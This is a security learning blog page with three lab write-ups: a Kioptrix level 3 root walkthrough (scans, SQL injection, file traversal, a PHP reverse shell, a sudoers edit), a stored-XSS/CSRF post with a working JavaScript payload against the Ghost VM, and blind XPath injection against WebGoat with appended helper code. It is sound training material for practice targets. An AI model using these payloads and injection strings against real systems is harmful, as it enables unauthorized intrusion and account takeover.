Showing posts with label Injection.

Sunday, June 10, 2012

[Learning] Kioptrix level three

Links:

Watch the HD video online: http://vimeo.com/f4l13n5now/kioptrixlevel3

Description:

"This Kioptrix VM image is an easy challenge. The object of the game is to acquire root access via any means possible (except actually hacking the VM server or player).
The purpose of these games is to learn the basic tools and techniques in vulnerability assessment and exploitation. There are more ways than one to successfully complete the challenges."
                                                                                                                                        --------- Kioptrix team

Attacker:

Backtrack 5 R2
IP: 192.168.1.2/24

Victim:

Kioptrix level 3
IP: 192.168.1.18/24



Vulnerabilities & exploits:

1, GALLARIFIC PHP Photo Gallery Script (gallery.php) SQL Injection
2, Remote File Traversal & Local File Inclusion Exploit
3, Arbitrary File Upload Exploit



Attacking tools:

1, nmap
2, SQLMAP
3, Exploit-DB
4, John The Ripper
5, Metasploit



Attacking process:

1, Reconnaissance & Enumeration:
Use nmap to sweep the network for live hosts (add -sn for a ping sweep without port scanning):
nmap -n 192.168.1.0/24

Use nmap to probe the open ports and services (-sS and -O need raw sockets, so run as root; Backtrack does so by default):

nmap -sS -sV -O 192.168.1.18 -v

Found the following services:
[1] HTTP service running on port 80
[2] SSH service running on port 22

2, Exploit the vulnerable services:
[1] Exploit the remote directory traversal vulnerability to read "/etc/passwd" and enumerate users.
[2] Exploit the GALLARIFIC PHP Photo Gallery Script (gallery.php) SQL injection to dump usernames and password hashes.
[3] Use JTR to crack those hashes.
[4] Log in to the gallery as administrator, upload a PHP reverse-shell payload and catch the connection on the attacker machine (web-server privileges only).
or
[5] Use a cracked account to log in to the server via SSH (upgrade to user privileges).
[6] Browse the server's directories and collect information (found the file "CompanyPolicy.README").
[7] Edit "/etc/sudoers" to grant loneferret ALL privileges, then sudo to root.


Monday, September 5, 2011

Play with CSRF

Cross-Site Request Forgery (CSRF/XSRF)

Filed here under Injection, although strictly it is a different class of flaw: the attacker exploits the trust a site places in an authenticated user's browser, making that browser send requests the user never intended (the session cookie is attached automatically).
For more information, see the references.

Victim:  Ghost VM (XSS & CSRF), admin user on Ghost server
Attacker:  test user on Ghost server

Attacking process:
1, Log in to the Ghost server as the admin user.
2, Submit "<script>alert(1)</script>" to check for an XSS vulnerability. Of course it has one...

3, Use a web proxy (such as Burp) to capture and analyze how the web application works.
Here we submit the test string "abc".
Burp captures the first request (a POST to /ghost/blogView.php):

Burp captures the second request (a GET to /ghost/iframe.php?page=form.php):

Now we understand how it works:
two requests are sent to the server, so the attacking script must also send two requests.

We construct the malicious JavaScript. Because the page is vulnerable to stored XSS, it can be posted as content and will run in the admin's browser, on the site's own origin:

<script>
function test()
{
  // Form body for the first request, URL-encoded; the admin's session cookie is added by the browser
  var pd="vuln=<h1>Hacked%20by%20F4l13n5n0w&user=admin";
  var xmlhttp=new XMLHttpRequest();
  xmlhttp.onreadystatechange=function() {
    // readyState 4 = request complete; without this check the second request would fire on every state change
    if (xmlhttp.readyState!=4) return;
    var xmlhttp2=new XMLHttpRequest();
    xmlhttp2.open("GET", "/ghost/iframe.php?page=form.php", true);
    xmlhttp2.send();
  };
  xmlhttp.open("POST", "/ghost/blogView.php", true);
  xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
  xmlhttp.send(pd);
  // returning false stops the link from navigating away (and aborting the pending requests)
  return false;
}
</script>
Hi admin, here is a problem. Pls <a href="" onclick="return test()">check!</a>

Log in to the server as the test user, submit the attacking code, and wait for the admin to click it.

If the admin is tricked into clicking the "check" link, his browser silently submits the sentence "Hacked by F4l13n5n0w" to the server under his own session.

Done.

Note that because the script is stored on the site itself (via XSS), it runs on the same origin: the same-origin policy does not apply, and an anti-CSRF token would not help either, since the script could read it from the page. Fixing the XSS (HTML-encoding user input on output) is the real fix here; CSRF tokens or Origin/Referer checks stop the cross-site variant.


References:
[1] http://www.cgisecurity.com/csrf-faq.html
[2] https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29
[3] http://www.w3schools.com/ajax/ajax_xmlhttprequest_send.asp



Tuesday, August 23, 2011

Play with XPath Blind Explorer

xpath-blind-explorer v1.0 was released at Black Hat USA 2011 [1].

It is an automated tool that extracts the whole XML document behind an XPath query by exploiting a blind XPath injection vulnerability: the attacker never sees the data directly, only whether an injected condition made the query true or false.

Check the following links for more information:

Demo video:
https://www.youtube.com/watch?v=IDQAj09fBvI&feature=related

Download:
http://code.google.com/p/xpath-blind-explorer/downloads/list


The demo video only shows the GET method with a single parameter.

What about POST with multiple parameters?

Let's use it to attack the WebGoat XPath Injection lesson.

Victim:       WebGoat (XPATH Injection Lesson)
Attacker:   Windows with xpath-blind-explorer v1.0

Attacking process:

1, Submit a correct and an incorrect username/password (e.g. Mike/test123) and compare the two responses.

If the username and password are correct, the server returns the user's record; otherwise it returns nothing.
So we use "468100", a string that appears only in the successful response, as the "true" condition keyword.


2, Check the page source to find the form's request URL and the parameter names.
Using Firebug, the request URL is

http://192.168.235.134/WebGoat/attack?Screen=83&menu=1200

and the parameter names are

Username, Password and SUBMIT


3, Configure XPath Blind Explorer as follows:

Use Burp Proxy (listening on localhost, port 8080) to see how the request is built.

Add the session cookie so that the requests pass WebGoat's authentication.


4, Now we test the conditions.

Test the "true" condition:

Let's look at the request captured by Burp Proxy.

The injection code "'%20and%20'1'='1" is simply appended to the end of the whole parameter string, which has been URL-encoded as a single value. That means XPath Blind Explorer treats multiple parameters as one parameter (in the screenshot, the blue "Username" is the parameter name and the red part is the value, URL-encoded).

So we need to solve two problems:

1, The injection code is only appended at the very end, so we change the order of the parameters and put the injectable one last, e.g.:

SUBMIT=Submit&Username=Mike&Password=test123


2, Because XPath Blind Explorer treats everything after the first "=" as a single value, it URL-encodes the parameter separator "&" to "%26", which the server will not interpret as a separator. We need to turn it back into "&".

Here we use Burp Proxy's "match and replace" function, configured as follows.

The regex "(%26)" matches the encoded separator, and it is replaced with "&". (This also rewrites a genuine "%26" inside a value, so it is only safe while no parameter value contains an encoded "&".)



Now everything is ready. Let's launch it.

After waiting several minutes, we have the whole XML file.
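The following is an added example, not part of the original post and not XPath Blind Explorer's own code. It reproduces the two fixes above in code: the injectable parameter is moved last, and the "%26" produced when the tool URL-encodes the whole parameter string as one value is turned back into "&". It also shows the per-parameter encoding you would use when building the request yourself, which does not have the blanket-replace problem. The parameter names are the WebGoat lesson's; the model of the tool's encoder (only "&" in the value is assumed to be encoded, as the Burp capture described above shows) is an assumption, not the tool's source.

```javascript
// Added example, not XPath Blind Explorer's code. Models how the tool is observed
// to build a POST body and the two fixes from the text. The encoder below is an
// assumption based on the Burp capture (only "&" in the value is encoded).

// What the tool does with one "name=value" string: the part after the first "="
// is treated as a single value and URL-encoded, then the (already URL-encoded)
// injection is appended.
function toolEncodeValue(value) {
  return value.replace(/&/g, "%26");
}
function toolBuildsBody(paramString, injection) {
  const eq = paramString.indexOf("=");
  return paramString.slice(0, eq) + "=" + toolEncodeValue(paramString.slice(eq + 1)) + injection;
}

// Fix 1: reorder so the injectable parameter is last; the appended injection
// then lands inside its value. The order of the other parameters is preserved.
function orderInjectableLast(params, injectable) {
  const keys = Object.keys(params).filter((k) => k !== injectable).concat([injectable]);
  return keys.map((k) => k + "=" + params[k]).join("&");
}

// Fix 2: the Burp "match and replace" rule from the text, regex (%26) -> "&".
function restoreSeparators(body) {
  return body.replace(/%26/g, "&");
}

// The body as it reaches WebGoat after both fixes.
function buildInjectedBody(params, injectable, injection) {
  return restoreSeparators(toolBuildsBody(orderInjectableLast(params, injectable), injection));
}

// The cleaner way when you build the request yourself: encode every value on
// its own, so separators are never encoded and a real "&" inside a value
// survives as "%26". The blanket replace above cannot tell the two apart.
function buildBodyPerParam(params, injectable, injection) {
  const keys = Object.keys(params).filter((k) => k !== injectable).concat([injectable]);
  return keys
    .map((k) => k + "=" + encodeURIComponent(params[k]) + (k === injectable ? injection : ""))
    .join("&");
}

// Step 1 of the text: the "true" condition is recognised by a keyword that only
// the successful response contains ("468100" in the lesson).
function conditionIsTrue(responseBody, keyword) {
  return responseBody.indexOf(keyword) !== -1;
}

// Usage with the values from the text.
const params = { SUBMIT: "Submit", Username: "Mike", Password: "test123" };
const injection = "'%20and%20'1'='1";
console.log("tool output (separators broken):", toolBuildsBody(orderInjectableLast(params, "Password"), injection));
console.log("after Burp match/replace:      ", buildInjectedBody(params, "Password", injection));
console.log("per-parameter encoding:        ", buildBodyPerParam(params, "Password", injection));
```

Run it with node. The per-parameter builder is the one to copy if you script the attack without the tool; the match/replace rule is a workaround for a tool that cannot be told where the parameter boundaries are, and it breaks as soon as a value itself contains "&".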

References:
[1] http://penetration-testing.7safe.com/the-art-of-exploiting-lesser-known-injection-flaws-revealed-at-black-hat/
[2] http://www.zytrax.com/tech/web/regex.htm
[3] http://www.addedbytes.com/cheat-sheets/regular-expressions-cheat-sheet/
[4] http://www.regextester.com/